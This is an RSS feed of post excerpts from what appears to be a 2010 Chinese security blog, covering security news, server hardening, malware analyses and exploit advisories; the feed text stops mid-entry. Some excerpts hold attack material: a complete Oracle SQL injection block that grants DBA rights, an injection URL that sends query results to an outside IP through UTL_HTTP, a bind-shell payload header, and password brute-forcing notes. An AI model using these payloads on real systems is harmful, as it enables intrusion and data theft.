﻿<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
	<channel>
		<title>夜雨山庄</title>
		<link>http://www.hackclub.net/</link>
		<description>人的头脑太复杂,时间过得久,有时候连自己也被自己骗了,记下来才是最真实的......</description>
		<copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>
		<generator>SaBlog-X Version 1.6 Build 20080806</generator>
		<lastBuildDate>Sun, 14 Mar 2010 13:17:15 +0000</lastBuildDate>
		<ttl>30</ttl>
		<item>
			<guid>http://www.hackclub.net/show-124-1.html</guid>
			<title>随笔</title>
			<author>Akira</author>
			<description><![CDATA[<p>接手HNC并改版,在此留个记号....</p><br /><br /><a href="http://www.hackclub.net/show-124-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-124-1.html</link>
			<category domain="http://www.hackclub.net/category-8-1.html">乱七八糟</category>
			<pubDate>2010-03-05 20:36</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-123-1.html</guid>
			<title>新年学习计划</title>
			<author>Akira</author>
			<description><![CDATA[<p>新的一年, 新的开始. <br />
过完了农历新年,开始了新的生活. <br />
在过去的几年里,自己越来越不满足自己掌握的技术了<br />
再此拟定一个学习计划,希望能给自己带来一些方便, 随便在此做个记录.以备监督自己.</p><br /><br /><a href="http://www.hackclub.net/show-123-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-123-1.html</link>
			<category domain="http://www.hackclub.net/category-3-1.html">心情日志</category>
			<pubDate>2010-02-15 14:26</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-122-1.html</guid>
			<title>内核型Rootkit病毒应对策略</title>
			<author>Akira</author>
			<description><![CDATA[<p>本文通过实例讲解如何应对Rootkit（内核型）蠕虫病毒，本文是以感染orans.sys蠕虫病毒的计算机为例，分步介绍如何检测病毒体文件并手工清除病毒。</p><br /><br /><a href="http://www.hackclub.net/show-122-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-122-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-08-10 14:39</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-121-1.html</guid>
			<title>跟踪Blackhat的举动</title>
			<author>Akira</author>
			<description><![CDATA[<p>　　这文章没有主要不是针对入侵检测进行讨论，关于IDS，internet上有很多优秀的源程序供你选择，如果你对入侵检测感兴趣，我建议你使用如Network Flight Recorder 和snort程序来尝试。此文主要集中在智力收集信息上，特别是，怎样通过查看你的系统记录来获取攻击者操作信息，可能你对你能在自己的LOG记录上能发现多少信息感到很惊讶，但是，在我们讲述查看你记录前，我们首先必须讨论下加强你的系统LOG安全性，如果你不能信任你系统记录的完整性那这些记录将会一文不值，多数black-aht在进入系统之后第一件事情就是怎样更改记录文件，网上非常多类型的Rootkit工具可以清楚记录文件中他们的留下的踪迹(如cloak)，或者阻止所有系统的记录(如伪造过的syslogd)，因此，要想查看系统记录，你必须保护好你的记录文件。</p><br /><br /><a href="http://www.hackclub.net/show-121-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-121-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-08-10 14:36</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-120-1.html</guid>
			<title>黑帽大会研究员：思科IOS缺陷成为攻击目标</title>
			<author>Akira</author>
			<description><![CDATA[<p>虽然没有利用网络路由器漏洞发起的大规模攻击，但是VoIP的配置和新的Web服务功能&mdash;&mdash;有时是默认开启的&mdash;&mdash;使设备越来越受到恶意黑客的欢迎。</p><br /><br /><a href="http://www.hackclub.net/show-120-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-120-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-08-10 14:26</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-119-1.html</guid>
			<title>MMS信息欺骗攻击将影响全球</title>
			<author>Akira</author>
			<description><![CDATA[<p>在2009年的黑帽大会上年轻研究人员Zane Lackey和Luis Miras演示了对iPhone SMS的攻击。在这次演示中他们欺骗发送者并利用GSM运营商的网络的漏洞，在MMS信息回路绕过他们。</p><br /><br /><a href="http://www.hackclub.net/show-119-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-119-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-08-10 14:24</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-118-1.html</guid>
			<title>DNSSEC解决跨组织可信性和安全问题</title>
			<author>Akira</author>
			<description><![CDATA[<p>网络安全研究员Dan Kaminsky有一年的时间来回忆他在域名服务器（DNS）上发现的缓存投毒漏洞的影响。Kaminsky在去年的黑帽大会简报揭示了这种技术，结果利用漏洞变得更简单了，并使攻击者可以把网络请求重新定向到恶意网站。在这段时间，Kaminsky已经成为了改善DNS安全性，最终信任互联网络的倡导者。可以采用的方法之一是使用DNSSEC（DNS安全扩展， DNS Security Extensions），在本质上是把PKI（公钥基础设施）增加到网站请求中。在这次采访中，Kaminsky谈到了采用DNSSEC可以给网络带来更大的安全性和可信性，并为新的安全产品和服务的开发提供了新的平台。</p><br /><br /><a href="http://www.hackclub.net/show-118-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-118-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-08-10 14:20</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-117-1.html</guid>
			<title>黑帽大会上Kaminsky揭露X.509证书严重漏洞</title>
			<author>Akira</author>
			<description><![CDATA[<p>Kaminsky在黑帽大会上演示了公共密钥架构VeriSign中X.509加密，而且认证授权还在继续使用MD5和更糟的MD2错误的哈希运算。</p><br /><br /><a href="http://www.hackclub.net/show-117-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-117-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-08-10 14:18</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-116-1.html</guid>
			<title>打造Linux下超安全的LAMP服务器</title>
			<author>Akira</author>
			<description><![CDATA[<p>本文全面细致的介绍了在Linux下加固apache+php+mysql的方法，通过仔细阅读本文,你可以快速掌握安全配置apache,php,和mysql的方方面面，还有chroot这个前沿而强悍的技术，依靠这些知识，完全可以让你的WWW服务器在层出不穷的SQL注射(SQL Injection)和CSS跨站脚本攻击(Cross Site Script)中屹立不倒。</p><br /><br /><a href="http://www.hackclub.net/show-116-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-116-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-08-10 14:12</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-115-1.html</guid>
			<title>通过Orabrute暴力破解oracle密码</title>
			<author>Akira</author>
			<description><![CDATA[<p>1 标准的Oracle 密码可以由英文字母，数字，#，下划线(_)，美元字符($)构成，密码的最大长度为30 字符；Oracle 密码不能以&quot;$&quot;，&quot;#&quot;，&quot;_&quot;或任何数字开头；密码不能包含&quot;SELECT&quot;，&quot;DELETE&quot;，&quot;CREATE&quot;这类的Oracle/SQL 关键字。 <br />
2 Oracle 的弱算法加密机制：两个相同的用户名和密码在两台不同的Oracle 数据库机器中，将具有相同的 <br />
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。 <br />
3 Oracle 默认配置下，每个帐户如果有10 次的失败登录，此帐户将会被锁定。但是SYS 帐户在Oracle 数 <br />
据库中具有最高权限，能够做任何事情，包括启动/关闭Oracle 数据库。即使SYS 被锁定，也依然能够访问 <br />
数据库。</p><br /><br /><a href="http://www.hackclub.net/show-115-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-115-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-07-11 10:14</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-114-1.html</guid>
			<title>MySQL二次漏洞的简单防范</title>
			<author>Akira</author>
			<description><![CDATA[<p>众所周知，数据库操作中对于一些特殊字符（例如单引号&ldquo;'&rdquo;、反斜线&ldquo;\&rdquo;等元字符）有着严格的限制，如果向数据库中写入的数据含有这样的特殊字符，操作将会带来不安全因素。所以对于用户输入的数据，我们完全认为它是没有安全性的，需要在程序中对其进行适当的过滤处理后，方可写入数据库。</p><br /><br /><a href="http://www.hackclub.net/show-114-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-114-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-07-11 10:11</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-113-1.html</guid>
			<title>MSSQL数据库被插入木马批量删除sql语句</title>
			<author>Akira</author>
			<description><![CDATA[<p>MSSQL数据库被插入木马批量删除sql语句<br />
MSSQL数据库被插入木马批量删除sql语句，一朋友服务器被批量插入了js木马，几乎每个表的文本字段都被插入了，网上找了这个sql语句，留着备用。</p><br /><br /><a href="http://www.hackclub.net/show-113-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-113-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-07-11 10:10</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-112-1.html</guid>
			<title>命令行下建立VPN</title>
			<author>Akira</author>
			<description><![CDATA[<p>.前提 <br />
服务里 windows防火墙停止（或者麻烦点可以把router协议，端口1723配进去） <br />
远程注册表服务必须开启 <br />
server服务必须开启 <br />
router路由服务必须开启</p><br /><br /><a href="http://www.hackclub.net/show-112-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-112-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-07-11 10:03</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-111-1.html</guid>
			<title>Oracle+nc注射</title>
			<author>Akira</author>
			<description><![CDATA[<p>url语句简单如下所示： <br />
<br />
http://localhost/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- <br />
<br />
内容如下：</p><br /><br /><a href="http://www.hackclub.net/show-111-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-111-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-07-11 10:01</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-110-1.html</guid>
			<title>FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com<br />
&nbsp;*<br />
&nbsp;* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount<br />
&nbsp;* (CVE-2008-3531) vulnerability:</p><br /><br /><a href="http://www.hackclub.net/show-110-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-110-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:53</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-109-1.html</guid>
			<title>Windows Live Messenger Plus! FileServer 1.0 Directory Traversal Vuln</title>
			<author>Akira</author>
			<description><![CDATA[<p>The FileServer script allows a user using Windows Live Messenger Plus! to share a defined folder and its subfolders and files with a contact.<br />
Authentication is done using a user-defined username and password.<br />
I have found a vulnerability in this script, which allows for downloading of EVERY file on the same disk as the defined folder (&quot;root folder&quot;),<br />
even outside the root folder. The script can be found at http://www.msgpluslive.nl/scripts/view/65-FileServer/</p><br /><br /><a href="http://www.hackclub.net/show-109-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-109-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:51</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-108-1.html</guid>
			<title>WordPress Privileges Unchecked in admin.php and Multiple Information</title>
			<author>Akira</author>
			<description><![CDATA[<p>WordPress is a web application written in PHP that allows the easy<br />
installation of a flexible weblog on any computer connected to the<br />
Internet. WordPress 2.7 reached more than 6 million downloads during<br />
June 2009 [9].<br />
<br />
A vulnerability was found in the way that WordPress handles some URL<br />
requests. This results in unprivileged users viewing the content of<br />
plugins configuration pages, and also in some plugins modifying plugin<br />
options and injecting JavaScript code. Arbitrary native code may be run<br />
by a malicious attacker if the blog administrator runs injected<br />
JavasScript code that edits blog PHP code. Many WordPress-powered blogs,<br />
hosted outside 'wordpress.com', allow any person to create unprivileged<br />
users called subscribers. Other sensitive username information<br />
disclosures were found in WordPress.</p><br /><br /><a href="http://www.hackclub.net/show-108-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-108-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:49</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-107-1.html</guid>
			<title>MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray&nbsp; (Advisory 972890)<br />
Written by SecureState R&amp;D Team &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />
Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />
&nbsp;http://www.securestate.com&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br />
win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind</p><br /><br /><a href="http://www.hackclub.net/show-107-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-107-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:46</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-106-1.html</guid>
			<title>Sun One WebServer 6.1 JSP Source Viewing vulnerability</title>
			<author>Akira</author>
			<description><![CDATA[<p><br />
<br />
System: Sun-ONE-Web-Server/6.1, Windows Server 2003<br />
<br />
SunOne WebServer (formerly Netscape Enterprise Server, iPlanet) on Windows Systems lets remote people disclose<br />
JSP Source code.</p><br /><br /><a href="http://www.hackclub.net/show-106-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-106-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:44</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-105-1.html</guid>
			<title>xscreensaver 5.01 Arbitrary File Disclosure Symlink Attack Vulnerability</title>
			<author>Akira</author>
			<description><![CDATA[<p>The �xscreensaver� program distributed normally with Xorg can be abused<br />
to disclose local files owned by other users (also of the root account).<br />
Xscreensaver has the setuid bit on by default (Example: Opensolaris)<br />
The xscreensaver program uses the file ~/.xscreensaver to read configuration<br />
options from. If this file is a symlink to another file then this file is parsed<br />
and output is shown on the display. It has to be noted that during the parsing<br />
of the file it may be possible that not the full file contents will be shown.</p><br /><br /><a href="http://www.hackclub.net/show-105-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-105-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-11 09:43</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-104-1.html</guid>
			<title>Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>DECLARE<br />
D NUMBER;<br />
BEGIN<br />
D := DBMS_SQL.OPEN_CURSOR;<br />
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);<br />
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');<br />
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');<br />
end;</p><br /><br /><a href="http://www.hackclub.net/show-104-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-104-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-04 14:14</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-103-1.html</guid>
			<title>Apple Safari 4.x JavaScript Reload Remote Crash Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>Author&nbsp;&nbsp; : Marcell 'SkyOut' Dietl, Achim Hoffmann<br />
Email&nbsp;&nbsp;&nbsp; : mail [at] marcell-dietl [dot] de<br />
Vendor&nbsp;&nbsp; : http://www.apple.com/<br />
Product&nbsp; : http://www.apple.com/safari/<br />
Found&nbsp;&nbsp;&nbsp; : 12.06.2009<br />
Released : 01.07.2009<br />
<br />
Tested on:<br />
&nbsp;- Safari 4.0 at Windows XP SP3<br />
&nbsp;- Safari 4.0.1 at Mac OS X 10.5.7</p><br /><br /><a href="http://www.hackclub.net/show-103-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-103-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-04 14:11</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-102-1.html</guid>
			<title>“网络删帖”公司横空出世删除帖子有明码标价</title>
			<author>Akira</author>
			<description><![CDATA[<p>&ldquo;删除百度快照、删除负面新闻、删除负面信息请找专业团队。&rdquo;这是沈阳一个网名为&ldquo;番茄&rdquo;的网络删帖手在互联网上打出的广告语。<br />
<br />
近日，&ldquo;网络删帖&rdquo;公司这一新名词的横空出世引发了很大的争议。事实上，在当前互联网上有无数的&ldquo;番茄&rdquo;存在着，他们的背后很多甚至是专业的&ldquo;网络删帖&rdquo;公司。</p><br /><br /><a href="http://www.hackclub.net/show-102-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-102-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-07-04 08:16</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-101-1.html</guid>
			<title>网卡MAC地址获取远程</title>
			<author>Akira</author>
			<description><![CDATA[<p>在实际的应用系统中，我们往往会需要在程序运行时获取当前机器的网卡的MAC地址，以便作为某种标识之用，如控制程序的合法性等。下文就如何用Microsoft Visual C++ 6.0开发这样的程序演示如何实现其要点。 <br />
---- 这里采用的方法是通过Windows 9x/NT/Win2000中内置的NetApi32.DLL的功能来实现的，首先通过发送NCBENUM命令获取网卡的数目和每个网卡的内部编号，然后对每个网卡标号发送NCBASTAT命令获取其MAC地址。注意：这里的网卡是指捆绑了NetBeui协议的通信协议栈，可以在网卡的属性处查看到。<br />
--- 请运行VC++，打开一个新的工程，选择创建一个Win32 Console程序，然后按下文输入代码，并请参见其中的注释：</p><br /><br /><a href="http://www.hackclub.net/show-101-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-101-1.html</link>
			<category domain="http://www.hackclub.net/category-2-1.html">数据编程</category>
			<pubDate>2009-07-03 10:38</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-100-1.html</guid>
			<title>一个SQL Server Sa密码破解的存储过程</title>
			<author>Akira</author>
			<description><![CDATA[<p>/*--穷举法破解 SQL Server 用户密码 <br />
可以破解中文,特殊字符,字符+尾随空格的密码 <br />
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII <br />
理论上可以破解任意位数的密码 <br />
条件是你的电脑配置足够,时间足够</p><br /><br /><a href="http://www.hackclub.net/show-100-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-100-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-07-03 10:34</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-99-1.html</guid>
			<title>Orcale TNS listener support for nmap</title>
			<author>Akira</author>
			<description><![CDATA[<p>Orcale TNS listener support for nmap<br />
so upgraded to latest version of nmap and it will now give you TNS listener versions. I couldnt find the exact build where this started but its certainly handy.</p><br /><br /><a href="http://www.hackclub.net/show-99-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-99-1.html</link>
			<category domain="http://www.hackclub.net/category-9-1.html">工具下载</category>
			<pubDate>2009-07-03 10:31</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-98-1.html</guid>
			<title>论外挂与反外挂</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;自&lt;&lt;石器时代&gt;&gt;开始, 外挂这一名词渐渐为世人所知. 到盛大第一款网游&lt;&lt;传奇&gt;&gt; 刚开始的宣传语 &lt;永无外挂&gt; <br />
基本上所有的玩家都知道了有个叫外挂的玩意. 等到了&lt;&lt;MU&gt;&gt;基本上玩游戏的都是人手一挂.<br />
但是当时的运营商并没有怎么把反外挂放在心上-当时游戏的模式只是点卡与月卡. 只要你玩游戏,总是要付费的.<br />
运营商需要担心的,只是外挂会造成多少用户流失而已. &lt;&lt;石器&gt;&gt;的运营商很绝--干脆自己卖外挂.<br />
而 &lt;&lt;传奇&gt;&gt;,&lt;&lt;MU&gt;&gt;则谣传与外挂分成. 这段时间乃是外挂的黄金期.<br />
但是从某外挂的作者被判刑后外挂似乎一下子收敛了很多. 但是实际的情况呢?</p><br /><br /><a href="http://www.hackclub.net/show-98-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-98-1.html</link>
			<category domain="http://www.hackclub.net/category-2-1.html">数据编程</category>
			<pubDate>2009-07-03 10:30</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-97-1.html</guid>
			<title>如何利用漏洞评估管理无线网风险</title>
			<author>Akira</author>
			<description><![CDATA[<p>　　保障无线局域网有很多种方法，但是，到底哪种方法更适合于用户所在的局域网，局域网是否能够完全有效地应对802.11和802.1x攻击，这些都需 要根据无线局域网自身的情况，采取不同的方法。无线局域网应用逐渐变得流行起来，但无线局域网的安全问题，却一直是制约行业发展的因素之一，也是业内人士 争论的焦点。本文将会为你介绍无线局域网漏洞以及如何消除这些潜在的威胁因素，还会为你阐述如何评估无线局域网漏洞并管理其风险。&nbsp;&nbsp;</p><br /><br /><a href="http://www.hackclub.net/show-97-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-97-1.html</link>
			<category domain="http://www.hackclub.net/category-6-1.html">无线网络</category>
			<pubDate>2009-07-02 08:43</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-96-1.html</guid>
			<title>斩断那只伸向Wi-Fi的黑手</title>
			<author>Akira</author>
			<description><![CDATA[<p>　　当你商务旅行之时，或许会在某个咖啡馆小憩。可是在你一边从无线热点上网冲浪、一边品味饮料或美食的同时，别人说不定就在偷偷窃取你的个人信息。因为无线信号采用无线形式，人们实际上能够从空中窃取你的数据。</p><br /><br /><a href="http://www.hackclub.net/show-96-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-96-1.html</link>
			<category domain="http://www.hackclub.net/category-6-1.html">无线网络</category>
			<pubDate>2009-07-02 08:39</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-95-1.html</guid>
			<title>从漏洞补丁到入侵防护系统IPS</title>
			<author>Akira</author>
			<description><![CDATA[<p>　　大部分普通电脑用户最关心哪家公司的漏洞补丁？答案一定是微软了。由于微软的补丁量很大，为此他们指定了一个周二补丁日，也就是所谓的 &ldquo;Patch Tuesday&rdquo;来统一发放补丁。之所以选择星期二，是为了避开繁忙的星期一。当然，非常紧急的补丁还是可以随时发布的。那这些补丁的作用是什么呢?当然 是修补哪些0day了。</p><br /><br /><a href="http://www.hackclub.net/show-95-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-95-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-07-02 08:36</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-94-1.html</guid>
			<title>Backdoor/Win32.Hupigon.gpnl分析</title>
			<author>Akira</author>
			<description><![CDATA[<p>病毒名称： Backdoor/Win32.Hupigon.gpnl<br />
病毒类型： 后门<br />
文件 MD5： 8FA2CB59ACCE93489659C21926FC3097<br />
公开范围： 完全公开<br />
危害等级： 4<br />
文件长度： 24,064 字节<br />
感染系统： Windows98以上版本<br />
开发工具： Microsoft Visual C++ 6.0</p><br /><br /><a href="http://www.hackclub.net/show-94-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-94-1.html</link>
			<category domain="http://www.hackclub.net/category-7-1.html">病毒分析</category>
			<pubDate>2009-07-02 08:27</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-93-1.html</guid>
			<title>Trojan/Win32.Mudrop.aui[Dropper]分析</title>
			<author>Akira</author>
			<description><![CDATA[<p>病毒名称： Trojan/Win32.Mudrop.aui[Trojan/Win32.Mudrop.aui[Dropper]分析]<br />
病毒类型： 木马<br />
文件 MD5： 6CF94B87CBEABFA0CEC421F3E4827823<br />
公开范围： 完全公开<br />
危害等级： 4<br />
文件长度： 13,840 字节<br />
感染系统： Windows98以上版本<br />
开发工具： Microsoft Visual C++ 6.0<br />
加壳类型： NsPacK V3.7</p><br /><br /><a href="http://www.hackclub.net/show-93-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-93-1.html</link>
			<category domain="http://www.hackclub.net/category-7-1.html">病毒分析</category>
			<pubDate>2009-07-02 08:26</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-92-1.html</guid>
			<title>Green Dam Remote Change System Time Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>// Green Dam listen on udp port 1234 and wait for the 4 bytes time value<br />
// We can send some bytes to change the time of the dest system<br />
// testgreendam[at]gmail.com</p><br /><br /><a href="http://www.hackclub.net/show-92-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-92-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-07-02 08:22</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-91-1.html</guid>
			<title>Metasploit使用教程</title>
			<author>Akira</author>
			<description><![CDATA[<p>这个工具包分Linux/Unix版的和Windows版，考虑到大多数人都是使用的Windows系统，这里我把Windows版的Metasploit使用方法说明一下，至于Linux/Unix下的使用方法和Windows下的也是大同小异，这里就不额外的说明了。<br />
<br />
&nbsp;&nbsp;&nbsp; 下载回Metasploit的安装程序之后双击安装，傻瓜化的安装过程，这里就不多说了。安装完成后可以看到安装目录下多了很多文件，主要的是：Msfconsole.bat和Msfweb.bat。第一个是这个工具包的控制台，第二个是这个程序的图形界面下的程序，下面我将和大家一起来领略它们的魅力！。<br />
<br />
&nbsp;&nbsp;&nbsp; 命令行下使用Metasploit<br />
<br />
运行后首先看到的是Metasploit欢迎界面，我们输入&ldquo;？&rdquo;</p><br /><br /><a href="http://www.hackclub.net/show-91-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-91-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-07-02 07:51</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-90-1.html</guid>
			<title>一成半网民曾访问钓鱼网站 专家三招防骗</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp; 监测数据显示目前有10%-15%的中国网民在使用浏览器、即时通讯、游戏等软件时，曾访问钓鱼网站，接触过欺诈信息。</p><br /><br /><a href="http://www.hackclub.net/show-90-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-90-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-06-30 20:00</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-89-1.html</guid>
